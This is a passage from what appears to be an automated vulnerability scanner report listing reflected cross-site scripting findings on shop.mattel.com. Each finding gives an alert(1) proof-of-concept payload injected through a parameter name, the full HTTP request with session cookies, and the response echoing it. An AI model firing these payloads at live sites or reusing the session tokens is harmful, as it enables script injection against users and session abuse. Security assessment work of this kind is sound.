Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:29 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36572


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                       
...[SNIP]...
<!-- === Request Query String: 71d78--><script>alert(1)</script>e4fc885191d=1 -->
...[SNIP]...

1.46. http://shop.mattel.com/productAlerts/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /productAlerts/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dca1"-alert(1)-"291191fc800 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /productAlerts/index.jsp?5dca1"-alert(1)-"291191fc800=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:28 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36540


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                       
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="5dca1"-alert(1)-"291191fc800=1";
   </script>
...[SNIP]...

1.47. http://shop.mattel.com/reviews/submitReview.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /reviews/submitReview.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a7fe"-alert(1)-"d845562a2b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/submitReview.jsp?7a7fe"-alert(1)-"d845562a2b8=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:29 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 37606


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="7a7fe"-alert(1)-"d845562a2b8=1";
   </script>
...[SNIP]...

1.48. http://shop.mattel.com/reviews/submitReview.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /reviews/submitReview.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 758cb--><script>alert(1)</script>0cca78edec4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /reviews/submitReview.jsp?758cb--><script>alert(1)</script>0cca78edec4=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:30 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 37638


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
...[SNIP]...
<!-- === Request Query String: 758cb--><script>alert(1)</script>0cca78edec4=1 -->
...[SNIP]...

1.49. http://shop.mattel.com/shop/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /shop/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6ed87--><script>alert(1)</script>0129bd33332 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /shop/index.jsp?categoryId=3719992&6ed87--><script>alert(1)</script>0129bd33332=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:38 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 39101


                                                                                                                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht
...[SNIP]...
<!-- === Request Query String: categoryId=3719992&6ed87--><script>alert(1)</script>0129bd33332=1 -->
...[SNIP]...

1.50. http://shop.mattel.com/shop/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /shop/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fccb6"-alert(1)-"478d101b660 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shop/index.jsp?categoryId=3719992&fccb6"-alert(1)-"478d101b660=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:37 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 39053


                                                                                                                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
       ess['locale']="es_US";
   
   
           ess['server']="http://shop.mattel.com";
    ess['qs']="categoryId=3719992&fccb6"-alert(1)-"478d101b660=1";
   </script>
...[SNIP]...

1.51. http://shop.mattel.com/sitemap/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /sitemap/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5759d--><script>alert(1)</script>be4ed9b675c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /sitemap/index.jsp?5759d--><script>alert(1)</script>be4ed9b675c=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:32 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 66217


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/
...[SNIP]...
<!-- === Request Query String: 5759d--><script>alert(1)</script>be4ed9b675c=1 -->
...[SNIP]...

1.52. http://shop.mattel.com/sitemap/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /sitemap/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a297a"-alert(1)-"2de4c0c0fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitemap/index.jsp?a297a"-alert(1)-"2de4c0c0fc=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:31 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 66183


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="a297a"-alert(1)-"2de4c0c0fc=1";
   </script>
...[SNIP]...

1.53. http://shop.mattel.com/storeLocator/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /storeLocator/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0f83"-alert(1)-"b1391c45b7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /storeLocator/index.jsp?b0f83"-alert(1)-"b1391c45b7e=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:26 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 40351


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="b0f83"-alert(1)-"b1391c45b7e=1";
   </script>
...[SNIP]...

1.54. http://shop.mattel.com/storeLocator/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /storeLocator/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a988f--><script>alert(1)</script>da1042d0f3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /storeLocator/index.jsp?a988f--><script>alert(1)</script>da1042d0f3d=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:26 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 40383


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/
...[SNIP]...
<!-- === Request Query String: a988f--><script>alert(1)</script>da1042d0f3d=1 -->
...[SNIP]...

1.55. https://shop.mattel.com/affiliate/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /affiliate/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7b99"-alert(1)-"9bd2d3d4d38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /affiliate/index.jsp?c7b99"-alert(1)-"9bd2d3d4d38=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:01 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
